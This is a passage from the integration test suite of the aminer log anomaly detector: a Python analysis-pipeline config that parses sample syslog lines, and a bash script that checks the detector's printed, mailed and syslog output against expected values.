from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(simple_unparsed_atom_handler, component_name="UnparsedHandler") from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name="NewPath") atom_filter.add_handler(new_match_path_detector) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/HomePath/Username', '/model/HomePath/Path'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewValueCombo") atom_filter.add_handler(new_match_path_value_combo_detector) # Include the e-mail notification handler only if the configuration parameter was set. from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler if DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS in analysis_context.aminer_config.config_properties: mail_notification_handler = DefaultMailNotificationEventHandler(analysis_context) analysis_context.register_component(mail_notification_handler, component_name="MailHandler") anomaly_event_handlers.append(mail_notification_handler) logdata-anomaly-miner-2.8.0/aecid-testsuite/integration/config22.py000066400000000000000000000227071500476301700253170ustar00rootroot00000000000000config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. 
# However if they exist, they have
# to be readable by the aminer process! Supported types are:
# * file://[path]: Read data from file, reopen it after rollover
# * unix://[path]: Open the path as UNIX local socket for reading
config_properties['LogResourceList'] = ['file:///tmp/syslog', 'file:///tmp/auth.log']

# Define the uid/gid of the process that runs the calculation
# after opening the log files:
# (the log resources listed above are opened first; the analysis
# itself then runs under this user and group)
config_properties['AminerUser'] = 'aminer'
config_properties['AminerGroup'] = 'aminer'

# Define the path, where aminer will listen for incoming remote
# control connections. When missing, no remote control socket
# will be created.
# Left commented out here, so no remote control socket is created
# for this test.
# config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket'

# Read the analysis from this file. That part of configuration
# is separated from the main configuration so that it can be loaded
# only within the analysis child. Non-absolute path names are
# interpreted relatively to the main configuration file (this
# file). When empty, this configuration has to contain the configuration
# for the child also.
# config_properties['AnalysisConfigFile'] = 'analysis.py'

# Log directory of this integration test; placed below /tmp like the
# persistence directory configured next.
config_properties['Core.LogDir'] = '/tmp/lib/aminer/log'

# Read and store information to be used between multiple invocations
# of aminer in this directory. The directory must only be accessible
# to the 'AminerUser' but not group/world readable. On violation,
# aminer will refuse to start. When undefined, '/var/lib/aminer'
# is used.
# NOTE(review): this test value lives below the shared /tmp tree; the
# access rule above still applies to it, so presumably the test harness
# creates it owner-only before aminer starts — confirm.
config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer'

# Define a target e-mail address to send alerts to. When undefined,
# no e-mail notification hooks are added.
config_properties['MailAlerting.TargetAddress'] = 'root@localhost'

# Sender address of e-mail alerts. When undefined, "sendmail"
# implementation on host will decide, which sender address should
# be used.
config_properties['MailAlerting.FromAddress'] = 'root@localhost'

# Define, which text should be prepended to the standard aminer
# subject.
Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. 
""" # Build the parsing model: from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement import datetime from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement service_children_disk_upgrade = [ DateTimeModelElement('DTM', b'%Y-%m-%d %H:%M:%S', datetime.datetime.now(datetime.timezone.utc).astimezone().tzinfo), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('HDRepair', b' System rebooted for hard disk upgrade')] service_children_home_path = [ FixedDataModelElement('Pwd', b'The Path of the home directory shown by pwd of the user '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Is', b' is: '), AnyByteDataModelElement('Path')] parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('DiskUpgrade', service_children_disk_upgrade), SequenceModelElement('HomePath', service_children_home_path)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. 
atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) from aminer.events.SyslogWriterEventHandler import SyslogWriterEventHandler syslog_writer_event_handler = SyslogWriterEventHandler(analysis_context) from aminer.events.KafkaEventHandler import KafkaEventHandler kafka_event_handler = KafkaEventHandler(analysis_context, 'test_topic', { 'bootstrap_servers': ['localhost:9092'], 'api_version': (2, 0, 1)}) from aminer.events.ZmqEventHandler import ZmqEventHandler zmq_event_handler = ZmqEventHandler(analysis_context, 'test_topic') from aminer.events.JsonConverterHandler import JsonConverterHandler json_converter_handler = JsonConverterHandler([kafka_event_handler, zmq_event_handler], analysis_context) from aminer.events.ScoringEventHandler import ScoringEventHandler scoring_event_handler = ScoringEventHandler([json_converter_handler], analysis_context) anomaly_event_handlers = [stream_printer_event_handler, syslog_writer_event_handler, json_converter_handler, scoring_event_handler] from aminer.input.SimpleMultisourceAtomSync import SimpleMultisourceAtomSync simple_multisource_atom_sync = SimpleMultisourceAtomSync([atom_filter], 9) # Now define the AtomizerFactory using the model. A simple line # based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory( parsing_model, [simple_multisource_atom_sync], anomaly_event_handlers, default_timestamp_path_list=['model/DiskUpgrade/DTM'], use_real_time=True) # Just report all unparsed atoms to the event handlers. 
from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(simple_unparsed_atom_handler, component_name="UnparsedHandler") from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name="NewPath") atom_filter.add_handler(new_match_path_detector) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/HomePath/Username', '/model/HomePath/Path'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewValueCombo") atom_filter.add_handler(new_match_path_value_combo_detector) from aminer.analysis.SlidingEventFrequencyDetector import SlidingEventFrequencyDetector sefd = SlidingEventFrequencyDetector(aminer_config=analysis_context.aminer_config, anomaly_event_handlers=[scoring_event_handler], window_size=2, set_upper_limit=1, learn_mode=True, output_logline=False, scoring_path_list=["/model/HomePath/Username"]) analysis_context.register_component(sefd, component_name="SlidingEventFrequencyDetector") atom_filter.add_handler(sefd) # Include the e-mail notification handler only if the configuration parameter was set. 
from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler if DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS in analysis_context.aminer_config.config_properties: mail_notification_handler = DefaultMailNotificationEventHandler(analysis_context) analysis_context.register_component(mail_notification_handler, component_name="MailHandler") anomaly_event_handlers.append(mail_notification_handler) logdata-anomaly-miner-2.8.0/aecid-testsuite/integration/declarations.sh000077500000000000000000000556161500476301700263500ustar00rootroot00000000000000#!/bin/bash source ../config # declare all expected values without the variable ones. These arrays are used to compare with the incoming log lines. declare -a NEW_PATH_HD_REPAIR_1=("New path(s) detected" "NewMatchPathDetector: \"NewPath\" (1 lines)" " /model/DiskUpgrade: " ": System rebooted for hard disk upgrade" " /model/DiskUpgrade/DTM: " " /model/DiskUpgrade/UNameSpace1: " " /model/DiskUpgrade/UName: " " /model/DiskUpgrade/UNameSpace2: " " /model/DiskUpgrade/User: " " /model/DiskUpgrade/HDRepair: System rebooted for hard disk upgrade" "['/model/DiskUpgrade', '/model/DiskUpgrade/DTM', '/model/DiskUpgrade/UNameSpace1', '/model/DiskUpgrade/UName', '/model/DiskUpgrade/UNameSpace2', '/model/DiskUpgrade/User', '/model/DiskUpgrade/HDRepair']" "Original log line: ") declare -a UNPARSED_ATOM_1=("Unparsed atom received" "SimpleUnparsedAtomHandler: \"UnparsedHandler\" (1 lines)" " System rebooted for hard disk upgrad") declare -a UNPARSED_ATOM_2=("Unparsed atom received" "SimpleUnparsedAtomHandler: \"UnparsedHandler\" (1 lines)" ": System rebooted for hard disk upgrade") declare -a NEW_PATH_HOME_PATH_ROOT_1=("New path(s) detected" "NewMatchPathDetector: \"NewPath\" (1 lines)" " /model/HomePath: The Path of the home directory shown by pwd of the user root is: /root" " /model/HomePath/Pwd: The Path of the home directory shown by pwd of the user " " /model/HomePath/Username: root" " 
/model/HomePath/Is: is: " " /model/HomePath/Path: /root" "['/model/HomePath', '/model/HomePath/Pwd', '/model/HomePath/Username', '/model/HomePath/Is', '/model/HomePath/Path']" "Original log line: The Path of the home directory shown by pwd of the user root is: /root") declare -a NEW_VALUE_COMBINATION_HOME_PATH_ROOT_1=("New value combination(s) detected" "NewMatchPathValueComboDetector: \"NewValueCombo\" (1 lines)" "(b'root', b'/root')" "Original log line: The Path of the home directory shown by pwd of the user root is: /root") declare -a NEW_VALUE_COMBINATION_HOME_PATH_USER_1=("New value combination(s) detected" "NewMatchPathValueComboDetector: \"NewValueCombo\" (1 lines)" "(b'user', b'/home/user')" "Original log line: The Path of the home directory shown by pwd of the user user is: /home/user") declare -a NEW_VALUE_COMBINATION_HOME_PATH_GUEST_1=("New value combination(s) detected" "NewMatchPathValueComboDetector: \"NewValueCombo\" (1 lines)" "(b'guest', b'/home/guest')" "Original log line: The Path of the home directory shown by pwd of the user guest is: /home/guest") declare -a JSON_OUTPUT=() read -r -d '' VAR << END { "LogData": { "RawLogData": [ " END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END localhost root: System rebooted for hard disk upgrad" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1 }, "AnalysisComponent": { "AnalysisComponentIdentifier": 0, "AnalysisComponentType": "SimpleUnparsedAtomHandler", "AnalysisComponentName": "UnparsedHandler", "Message": "Unparsed atom received", "PersistenceFileName": null, "LogResource": "file:///tmp/syslog" } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 1, "AnalysisComponentType": "NewMatchPathDetector", "AnalysisComponentName": "NewPath", "Message": "New path(s) detected", "PersistenceFileName": "Default", "TrainingMode": true, "AffectedLogAtomPaths": [ "/model/DiskUpgrade", 
"/model/DiskUpgrade/DTM", "/model/DiskUpgrade/UNameSpace1", "/model/DiskUpgrade/UName", "/model/DiskUpgrade/UNameSpace2", "/model/DiskUpgrade/User", "/model/DiskUpgrade/HDRepair" ], "LogResource": "file:///tmp/auth.log" }, "LogData": { "RawLogData": [ " END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END localhost root: System rebooted for hard disk upgrade" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1, "AnnotatedMatchElement": { "/model/DiskUpgrade": " END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ", "/model/DiskUpgrade/DTM": " END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END "/model/DiskUpgrade/UNameSpace1": " ", "/model/DiskUpgrade/UName": "localhost", "/model/DiskUpgrade/UNameSpace2": " ", "/model/DiskUpgrade/User": "root:", "/model/DiskUpgrade/HDRepair": " System rebooted for hard disk upgrade" } } } { "LogData": { "RawLogData": [ " END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END localhost root: System rebooted for hard disk upgrad" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1 }, "AnalysisComponent": { "AnalysisComponentIdentifier": 0, "AnalysisComponentType": "SimpleUnparsedAtomHandler", "AnalysisComponentName": "UnparsedHandler", "Message": "Unparsed atom received", "PersistenceFileName": null, "LogResource": "file:///tmp/auth.log" } } { "LogData": { "RawLogData": [ " END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END localhost root: System rebooted for hard disk upgrade" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1 }, "AnalysisComponent": { "AnalysisComponentIdentifier": 0, "AnalysisComponentType": "SimpleUnparsedAtomHandler", "AnalysisComponentName": "UnparsedHandler", "Message": 
"Unparsed atom received", "PersistenceFileName": null, "LogResource": "file:///tmp/syslog" } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 1, "AnalysisComponentType": "NewMatchPathDetector", "AnalysisComponentName": "NewPath", "Message": "New path(s) detected", "PersistenceFileName": "Default", "TrainingMode": true, "AffectedLogAtomPaths": [ "/model/HomePath", "/model/HomePath/Pwd", "/model/HomePath/Username", "/model/HomePath/Is", "/model/HomePath/Path" ], "LogResource": "file:///tmp/auth.log" }, "LogData": { "RawLogData": [ "The Path of the home directory shown by pwd of the user root is: /root" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1, "AnnotatedMatchElement": { "/model/HomePath": "The Path of the home directory shown by pwd of the user root is: /root", "/model/HomePath/Pwd": "The Path of the home directory shown by pwd of the user ", "/model/HomePath/Username": "root", "/model/HomePath/Is": " is: ", "/model/HomePath/Path": "/root" } } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 2, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "NewValueCombo", "Message": "New value combination(s) detected", "PersistenceFileName": "Default", "TrainingMode": true, "AffectedLogAtomPaths": [ "/model/HomePath/Username", "/model/HomePath/Path" ], "AffectedLogAtomValues": [ "root", "/root" ], "LogResource": "file:///tmp/auth.log" }, "LogData": { "RawLogData": [ "The Path of the home directory shown by pwd of the user root is: /root" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1, "AnnotatedMatchElement": { "/model/HomePath": "The Path of the home directory shown by pwd of the user root is: /root", "/model/HomePath/Pwd": "The Path of the home directory shown by pwd of the user ", 
"/model/HomePath/Username": "root", "/model/HomePath/Is": " is: ", "/model/HomePath/Path": "/root" } } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 2, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "NewValueCombo", "Message": "New value combination(s) detected", "PersistenceFileName": "Default", "TrainingMode": true, "AffectedLogAtomPaths": [ "/model/HomePath/Username", "/model/HomePath/Path" ], "AffectedLogAtomValues": [ "user", "/home/user" ], "LogResource": "file:///tmp/syslog" }, "LogData": { "RawLogData": [ "The Path of the home directory shown by pwd of the user user is: /home/user" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1, "AnnotatedMatchElement": { "/model/HomePath": "The Path of the home directory shown by pwd of the user user is: /home/user", "/model/HomePath/Pwd": "The Path of the home directory shown by pwd of the user ", "/model/HomePath/Username": "user", "/model/HomePath/Is": " is: ", "/model/HomePath/Path": "/home/user" } } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 2, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "NewValueCombo", "Message": "New value combination(s) detected", "PersistenceFileName": "Default", "TrainingMode": true, "AffectedLogAtomPaths": [ "/model/HomePath/Username", "/model/HomePath/Path" ], "AffectedLogAtomValues": [ "guest", "/home/guest" ], "LogResource": "file:///tmp/auth.log" }, "LogData": { "RawLogData": [ "The Path of the home directory shown by pwd of the user guest is: /home/guest" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1, "AnnotatedMatchElement": { "/model/HomePath": "The Path of the home directory shown by pwd of the user guest is: /home/guest", "/model/HomePath/Pwd": 
"The Path of the home directory shown by pwd of the user ", "/model/HomePath/Username": "guest", "/model/HomePath/Is": " is: ", "/model/HomePath/Path": "/home/guest" } } } END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END { "AnalysisComponent": { "AnalysisComponentIdentifier": 3, "AnalysisComponentType": "SlidingEventFrequencyDetector", "AnalysisComponentName": "SlidingEventFrequencyDetector", "Message": "Frequency exceeds range for the first time", "PersistenceFileName": "Default", "TrainingMode": true, "AffectedLogAtomPaths": [], "AffectedLogAtomValues": [ "/model/HomePath", "/model/HomePath/Pwd", "/model/HomePath/Username", "/model/HomePath/Is", "/model/HomePath/Path" ], "LogResource": "file:///tmp/auth.log" }, "FrequencyData": { "ExpectedLogAtomValuesFrequencyRange": [ 0, 1 ], "LogAtomValuesFrequency": 2, "WindowSize": 2 }, "LogData": { "RawLogData": [ "The Path of the home directory shown by pwd of the user guest is: /home/guest" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") # These strings are used in the isExpectedOutput()-function to identify the next array to be compared with. NEW_PATH_HD_REPAIR="new_path_hd_repair" UNPARSED_ATOM_HD_REPAIR="unparsed_atom_hd_repair" UNPARSED_ATOM_DATE_TIME="unparsed_atom_date_time" UNPARSED_ATOM_UNAME="unparsed_atom_uname" NEW_PATH_HOME_PATH_ROOT="new_path_home_path_root" NEW_VALUE_COMBINATION_HOME_PATH_ROOT="new_value_combination_home_path_root" NEW_VALUE_COMBINATION_HOME_PATH_USER="new_value_combination_home_path_user" NEW_VALUE_COMBINATION_HOME_PATH_GUEST="new_value_combination_home_path_guest" COUNTER=0 # This function checks if the input value starts with a date of the format YYYY-mm-dd HH:MM:SS. # $1 = String parameter to check function isDate() { if [[ $# -gt 0 && "$1" =~ [0-9]{4}\-[0-9]{2}\-[0-9]{2}\ [0-9]{2}:[0-9]{2}:[0-9]{2}* ]]; then return 0 fi return 1 } # This function checks if the input value contains the local UName. 
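# $1 = String parameter to check
# Returns 0 when $1 contains the content of /etc/hostname as a token
# preceded by a space, 1 otherwise (also when no argument is given).
function isUname() {
  local host
  host=$(cat /etc/hostname)
  [[ $# -gt 0 && "$1" == *" ${host}"* ]]
}

# This function checks if the input value contains name of the currently logged in user.
# $1 = String parameter to check
# Returns 0 when $1 contains " <user>:" (the user name followed by a
# colon, as it appears in the log lines), 1 otherwise.
function isUser() {
  local user
  user=$(id -u -n)
  [[ $# -gt 0 && "$1" == *" ${user}:"* ]]
}

# This function checks if the input value starts with a date followed by the local UName and the name of the currently logged in user.
# The return values vary depending at which point the error occurs.
# $1 = String parameter to check
# Return values: 0 = all markers present, 1 = no argument,
# 2 = no leading date, 3 = host name missing, 4 = user name missing.
function startswithPredefinedMarkers() {
  if [ $# -eq 0 ]; then
    return 1
  fi
  # Test the function status directly instead of reading $? afterwards.
  if ! isDate "$1"; then
    return 2
  fi
  if ! isUname "$1"; then
    return 3
  fi
  if ! isUser "$1"; then
    return 4
  fi
  return 0
}

# This function reads the output of the aminer, which is saved at /tmp/output, until an empty line occurs.
# Every time a paragraph was read, the global variable $COUNTER is set to the iteration variable $i.
# On the next call of this function all lines until $i equals $COUNTER are skipped.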
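# $1 = String identifier for the expected values (one of the *_HD_REPAIR / *_HOME_PATH_* identifiers)
# $2 = Prefix position; a negative or too high value disables the marker check (defaults to -1 when omitted)
#
# Return values:
#   0 = the next paragraph of /tmp/output matches the selected EXPECTED array completely
#   1 = unknown identifier
#   2 = a line failed the date/marker check or did not contain the expected value (details are echoed)
#   3 = the paragraph ended before all EXPECTED entries were seen
# Side effect: the global $COUNTER is advanced past the paragraph that was read.
function isExpectedOutput() {
    before=$COUNTER
    i=0
    temp=0
    prefix_pos="${2:--1}"
    #ADD HERE
    case "$1" in
        "$NEW_PATH_HD_REPAIR")                    EXPECTED=("${NEW_PATH_HD_REPAIR_1[@]}") ;;
        "$UNPARSED_ATOM_HD_REPAIR")               EXPECTED=("${UNPARSED_ATOM_1[@]}") ;;
        "$UNPARSED_ATOM_DATE_TIME")               EXPECTED=("${UNPARSED_ATOM_2[@]}") ;;
        "$UNPARSED_ATOM_UNAME")                   EXPECTED=("${UNPARSED_ATOM_2[@]}") ;;
        "$NEW_PATH_HOME_PATH_ROOT")               EXPECTED=("${NEW_PATH_HOME_PATH_ROOT_1[@]}") ;;
        "$NEW_VALUE_COMBINATION_HOME_PATH_ROOT")  EXPECTED=("${NEW_VALUE_COMBINATION_HOME_PATH_ROOT_1[@]}") ;;
        "$NEW_VALUE_COMBINATION_HOME_PATH_USER")  EXPECTED=("${NEW_VALUE_COMBINATION_HOME_PATH_USER_1[@]}") ;;
        "$NEW_VALUE_COMBINATION_HOME_PATH_GUEST") EXPECTED=("${NEW_VALUE_COMBINATION_HOME_PATH_GUEST_1[@]}") ;;
        *)
            echo "No valid expected value found!"
            return 1
            ;;
    esac
    input="/tmp/output"
    while IFS= read -r line
    do
        # Skip already processed lines.
        if [ $i -lt $COUNTER ]; then
            i=$((i + 1))
            continue
        # Paragraphs always terminate with an empty line. This line also must be skipped.
        elif [[ $i -eq $COUNTER && $line == "" ]]; then
            i=$((i + 1))
            temp=1
            continue
        fi
        # Position of the current line inside the paragraph being compared
        # ($COUNTER equals $before until the loop has finished).
        pos=$((i - before - temp))
        # Every paragraph must start with a date of the format YYYY-mm-dd HH:MM:SS.
        if [ $pos -eq 0 ]; then
            isDate "$line"
            ret=$?
            # Test the saved status: right after the assignment $? is always 0, which
            # previously made this check a no-op.
            if [[ $ret != 0 ]]; then
                echo "isDate() return value: $ret"
                return 2
            fi
        fi
        # When the prefix position is reached, the predefined markers are checked (date -> uname -> user).
        # To avoid this check, just use a negative or too high value for the prefix position.
        if [ $pos -eq $prefix_pos ]; then
            startswithPredefinedMarkers "$line"
            ret=$?
            if [[ $ret != 0 ]]; then
                echo "Startswith() return value: $ret"
                return 2
            fi
        fi
        # At the end of a paragraph stop reading the file and return.
        if [ "$line" == "" ]; then
            break
        # When the current line contains the expected value at the expected position,
        # read until the following values do not match or the EXPECTED array ends
        # (an empty EXPECTED entry would match every line, hence the explicit != "" guard).
        elif [[ "$line" == *"${EXPECTED[$pos]}"* ]]; then
            i=$((i + 1))
            while [[ "$line" == *"${EXPECTED[$((i - before - temp))]}"* && "${EXPECTED[$((i - before - temp))]}" != "" ]]
            do
                i=$((i + 1))
            done
        # An error occurred when the line does not match and is not empty.
        else
            echo "line: $line"
            echo "expected: ${EXPECTED[$pos]}"
            return 2
        fi
    done < "$input"
    COUNTER=$i
    # Check if all elements of the EXPECTED array were processed.
    if [ $((i - before - temp)) -eq "${#EXPECTED[@]}" ]; then
        return 0
    fi
    return 3
}

# Runs isExpectedOutput for one expected paragraph and reports the result.
# $1 = Human readable label used in the messages (e.g. "Unparsed Atom")
# $2 = String identifier passed to isExpectedOutput
# $3 = Prefix position passed to isExpectedOutput
# Returns 0 when the paragraph was found, 1 otherwise.
function _reportExpectedOutput() {
    local label="$1"
    isExpectedOutput "$2" "$3"
    local ret=$?
    if [ $ret == 0 ]; then
        echo "$label found as expected."
        return 0
    fi
    echo "Expected $label was not found! Return value: $ret"
    echo ""
    return 1
}

# This function checks if the output of the StreamPrinterEventHandler is as expected.
# The order of the events is fixed and must be expanded every time a new log line is added to the integration test.
# Returns 0 when every expected paragraph was found in order, 1 otherwise.
function checkAllOutputs() {
    res=0
    _reportExpectedOutput "Unparsed Atom" $UNPARSED_ATOM_HD_REPAIR 2 || res=1
    _reportExpectedOutput "NewMatchPath" $NEW_PATH_HD_REPAIR -1 || res=1
    _reportExpectedOutput "Unparsed Atom" $UNPARSED_ATOM_HD_REPAIR 2 || res=1
    _reportExpectedOutput "Unparsed Atom" $UNPARSED_ATOM_UNAME -1 || res=1
    _reportExpectedOutput "NewMatchPath" $NEW_PATH_HOME_PATH_ROOT -1 || res=1
    _reportExpectedOutput "NewValueCombination" $NEW_VALUE_COMBINATION_HOME_PATH_ROOT -1 || res=1
    _reportExpectedOutput "NewValueCombination" $NEW_VALUE_COMBINATION_HOME_PATH_USER -1 || res=1
    _reportExpectedOutput "NewValueCombination" $NEW_VALUE_COMBINATION_HOME_PATH_GUEST -1 || res=1
    #ADD HERE
    return $res
}

# This function checks if the output of the DefaultMailNotificationEventHandler is as expected.
# The $linecount variable is the fixed count of log lines and must be changed every time a new log line is added.
# At each loop run one mail is read into /tmp/out from which further checks are made.
# Relies on the global $time (epoch seconds, presumably the start time of the test) being set by the caller.
# Returns 0 when every line of every aminer mail was found in /tmp/output, 1 otherwise.
function checkAllMails() {
    res=0
    linecount=10
    # NOTE(review): installs a package with sudo as a side effect of a test run; on a
    # non-throwaway host it would be safer to fail here instead.
    if ! dpkg -s mailutils &> /dev/null; then
        echo -e "\e[31mMailutils-package is not installed! Installing it now..]"
        sudo apt install mailutils -y
    fi
    echo ""
    echo "waiting for mails to arrive.."
    echo ""
    i=1
    # NOTE(review): $i is decremented again on "wrong mail"/"old mail", so the loop has no
    # upper bound on retries if such mails keep being returned.
    while [ $i -lt $linecount ]
    do
        # Dump one mail (mail's 'p' command) into /tmp/out.
        sudo echo p | mail > /tmp/out
        input="/tmp/out"
        t=false
        aminerMail=false
        while IFS= read -r searched
        do
            # Between all mail headers and the content and after the content of the mail always is an empty line.
            # The paragraph found in the content must also be found in the previously created /tmp/output file.
            if [ "$searched" == "" ]; then
                if [ $t == false ]; then
                    t=true
                else
                    break
                fi
            fi
            # If the first empty line was found and the subject equals "aminer Alerts:" the following paragraph
            # must be found in the previously created /tmp/output file.
            if [[ $t == true && $aminerMail == true ]]; then
                expected="/tmp/output"
                found=false
                while IFS= read -r line
                do
                    if [[ "$line" == "$searched" ]]; then
                        found=true
                        break
                    fi
                done < "$expected"
            # Set the aminerMail boolean to True, when the expected subject was found
            elif [[ "$searched" == *"Subject: aminer Alerts:"* ]]; then
                aminerMail=true
            # Stop searching, when the subject is not the expected aminer subject.
            elif [[ "$searched" != *"Subject: aminer Alerts:"* && "$searched" == *"Subject:"* ]]; then
                echo "wrong mail"
                i=$(($i-1))
                break
            fi
            # If the time is lesser than the start time of the integration test, an old mail is found.
            if [[ "$searched" == *"Date: "* ]]; then
                d="${searched:6}"
                dat=$(date -d "$d" +%s)
                if [[ $dat -lt $time ]]; then
                    echo "old mail"
                    i=$(($i-1))
                    break
                fi
            fi
            # An error occurred, when a line was not found in the /tmp/output file.
            if [[ $t == true && $aminerMail == true && $found == false ]]; then
                echo "$searched"
                echo "$line"
                echo "not found!"
                res=1
            fi
        done < "$input"
        i=$(($i+1))
    done
    echo "finished waiting.."
    return $res
}

# This function checks if the output of the Syslog is as expected.
# Every paragraph of /tmp/output must appear in /var/log/syslog as "[<paragraph>] <line>" for the first
# line and "[<paragraph>-<line>] <line>" for all following lines; only syslog entries newer than the
# global $time (epoch seconds, set by the caller) are considered.
# Returns 0 when exactly $NUMBER_OF_LOG_LINES paragraphs were matched, 1 otherwise.
function checkAllSyslogs(){
    sudo tail -n 1000 /var/log/syslog > /tmp/out
    # A trailing empty line in /tmp/output would be counted as an extra paragraph; drop it.
    lastLine=$(tail -n 1 /tmp/output)
    if [[ $lastLine == "" ]]; then
        sudo sed -i "$ d" /tmp/output
    fi
    cntr=0
    input="/tmp/out"
    i=0
    j=0
    while IFS= read -r searched
    do
        # every syslog starts with a 15 characters long datetime.
        d="${searched:0:15}"
        dat=$(date -d "$d" +%s)
        # Ignore all old syslogs and just process the current ones.
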